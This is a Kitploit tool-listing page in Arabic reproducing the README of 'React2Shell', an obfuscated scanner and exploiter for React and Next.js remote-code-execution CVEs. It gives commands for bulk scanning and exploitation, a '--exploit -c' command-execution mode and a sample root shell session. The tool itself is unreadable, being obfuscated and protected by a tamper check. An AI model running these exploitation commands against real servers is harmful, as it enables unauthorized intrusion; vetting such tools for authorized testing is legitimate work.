Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell — React2Shell - CVE-2025-55182 & CVE-2025-66478 | Kitploit
أدوات/GitLabGitLab/letchupkt/react2shell
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitLabletchupkt/react2shell

React2Shell

React2Shell - CVE-2025-55182 & CVE-2025-66478

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell - CVE-2025-55182 و CVE-2025-66478

المؤلف: LAKSHMIKANTHAN K (letchupkt)
إنستغرام: @letchu_pkt
الإصدار: 2.0.0 (مبهم)
التاريخ: 2025-12-07


🚀 البداية السريعة

تشغيل الماسح الضوئي

root@kitploit:~
python react2shell.py

هذا كل شيء! سيقوم الماسح الضوئي بـ:

  1. التحقق من سلامته
  2. فك ضغط الكود
  3. التنفيذ بشكل طبيعي

جميع الميزات تعمل بنفس الطريقة تماماً!

root@kitploit:~
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit

🎯 الاستخدام

الوضع التفاعلي (موصى به)

root@kitploit:~
python react2shell.py

وضع سطر الأوامر

root@kitploit:~
# Scan single URL
python react2shell.py -u https://target.com

# Scan multiple URLs
python react2shell.py -f targets.txt

# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"

# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json

🔒 ميزات الحماية

التحقق من السلامة

في كل مرة تقوم فيها بتشغيل الماسح الضوئي، يقوم تلقائياً بـ:

  1. فك ضغط الكود المصدري المشفر
  2. حساب تجزئة SHA256 للكود
  3. مقارنتها مع التجزئة المتوقعة
  4. منع التنفيذ إذا كانت التجزئة غير متطابقة

ماذا يحدث إذا تم التعديل؟

إذا حاول شخص ما تعديل الكود المبهم:

root@kitploit:~
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt

سيرفض الماسح الضوئي التشغيل إذا اكتشف أي تلاعب.


✨ الميزات

جميع الميزات الأصلية محفوظة بنسبة 100% :

كشف CVE المزدوج

  • ✅ CVE-2025-55182 (React Server Functions RCE)
  • ✅ CVE-2025-66478 (Next.js RSC RCE)
  • ✅ الكشف التلقائي عن الإصدار
  • ✅ تقييم الثغرات

إمكانيات المسح

  • ✅ مسح URL واحد
  • ✅ مسح جماعي من ملف
  • ✅ متعدد الخيوط (حتى عدد غير محدود من الخيوط)
  • ✅ تكوين المهلة
  • ✅ منطق إعادة المحاولة

ميزات الاستغلال

  • ✅ تنفيذ الأوامر
  • ✅ وضع الصدفة التفاعلي
  • ✅ استخراج المخرجات
  • ✅ أوامر مخصصة
  • ✅ استغلال جماعي

واجهة المستخدم

  • ✅ قائمة تفاعلية
  • ✅ وضع CLI
  • ✅ إخراج ملون
  • ✅ تتبع التقدم
  • ✅ تسجيل مباشر

📖 أمثلة

المثال 1: مسح URL واحد

root@kitploit:~
python react2shell.py -u https://example.com

المخرجات:

root@kitploit:~
=================================================================
 CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================

[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
    Version: 15.0.1
    CVE-2025-55182: VULNERABLE
    CVE-2025-66478: VULNERABLE

المثال 2: الصدفة التفاعلية

root@kitploit:~
python react2shell.py
# Select option 5
# Enter target URL

جلسة الصدفة:

root@kitploit:~
shell> whoami
root

shell> pwd
/app

shell> ls -la
total 120
drwxr-xr-x    1 root     root          4096 Dec  6 10:30 .
...

shell> exit

المثال 3: المسح الجماعي

root@kitploit:~
python react2shell.py -f targets.txt -t 20 -o results.json

🚨 الاستخدام القانوني والأخلاقي

⚠️ تحذير خطير

هذه الأداة مخصصة لاختبار الأمان المصرح به فقط!

الاستخدام القانوني

✅ تطبيقاتك الخاصة
✅ اختبارات الاختراق المصرح بها
✅ برامج مكافآت الثغرات (ضمن النطاق)
✅ بحث أمني (مصرح به)

الاستخدام غير القانوني

❌ المسح غير المصرح به
❌ الاستغلال غير المصرح به
❌ أي نشاط غير قانوني
❌ انتهاك شروط الخدمة

إخلاء المسؤولية

المؤلف (LAKSHMIKANTHAN K) ليس مسؤولاً عن سوء استخدام هذه الأداة. المستخدمون وحدهم المسؤولون عن أفعالهم ويجب عليهم الامتثال لجميع القوانين المعمول بها.


🔧 استكشاف الأخطاء وإصلاحها

"فشل في فك ضغط كود الماسح الضوئي"

السبب: الملف تالف
الحل: قم بتنزيل نسخة جديدة

"فشل التحقق من سلامة الماسح الضوئي"

السبب: تم تعديل الملف
الحل: قم بتنزيل نسخة جديدة (لا تقم بتعديل الملف)

خطأ "الوحدة غير موجودة"

السبب: التبعيات المفقودة
الحل:

root@kitploit:~
pip install requests urllib3

الماسح الضوئي يعمل ببطء

السبب: عبء فك الضغط (ضئيل)
ملاحظة: يحدث مرة واحدة فقط عند بدء التشغيل، ثم يعمل بكامل سرعته


💡 الأسئلة الشائعة

س: هل يمكنني رؤية الكود المصدري؟

ج: الكود مبهم ومضغوط. يمكنك استخدام النسخة الأصلية غير المبهمة إذا كنت بحاجة لقراءة الكود.

س: هل يؤثر الإبهام على الأداء؟

ج: تأثير ضئيل. هناك تأخير بسيط عند بدء التشغيل لفك الضغط (~0.1 ثانية)، ثم يعمل بكامل سرعته.

س: هل يمكنني تعديل الكود المبهم؟

ج: لا. أي تعديل سيكسر فحص السلامة وسيرفض الماسح الضوئي التشغيل.

س: هل هذا آمن؟

ج: الإبهام ليس تشفيراً. لا يزال المهاجمون العازمون قادرين على الهندسة العكسية، لكنه صعب جداً ويستغرق وقتاً.

س: هل يمكنني الحصول على الكود الأصلي؟

ج: اتصل بالمؤلف على إنستغرام: @letchu_pkt


📞 الدعم والاتصال

معلومات المؤلف

الاسم: LAKSHMIKANTHAN K (letchupkt)
إنستغرام: @letchu_pkt

الحصول على المساعدة

  1. اقرأ ملف README هذا
  2. تحقق من تثبيت التبعيات
  3. تأكد من أنك لم تقم بتعديل الملف
  4. اتصل بالمؤلف على إنستغرام

الإبلاغ عن المشكلات

إذا واجهت مشكلات:

  1. صف المشكلة
  2. قم بتضمين رسائل الخطأ
  3. اذكر نظام التشغيل وإصدار بايثون
  4. اتصل عبر إنستغرام: @letchu_pkt

🎓 كيفية الاستخدام

الخطوة 1: تثبيت التبعيات

root@kitploit:~
pip install requests urllib3

الخطوة 2: تشغيل الماسح الضوئي

root@kitploit:~
python react2shell.py

الخطوة 3: اختر خياراً

اختر من القائمة التفاعلية أو استخدم وضع CLI.

الخطوة 4: المسح/الاستغلال

اتبع المطالبات أو قدم وسائط سطر الأوامر.


⚡ أوامر سريعة

root@kitploit:~
# Interactive mode
python react2shell.py

# Scan single URL
python react2shell.py -u https://target.com

# Bulk scan
python react2shell.py -f targets.txt -t 20

# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"

# Help
python react2shell.py --help

🛡️ ملاحظات ختامية

تذكر

  • هذه نسخة مبهمة - التعديلات ستكسرها
  • جميع الوظائف محفوظة
  • فحوصات السلامة تضمن الأصالة
  • استخدم بمسؤولية وأخلاقياً
  • فقط على أنظمة مصرح بها

المؤلف

LAKSHMIKANTHAN K (letchupkt)
إنستغرام: @letchu_pkt

شكراً لاستخدامك ماسح CVE الضوئي! 🚀


الإصدار: 2.0.0 (مبهم)
التاريخ: 2025-12-07
الترخيص: لاختبار الأمان المصرح به فقط

تنزيل الأداة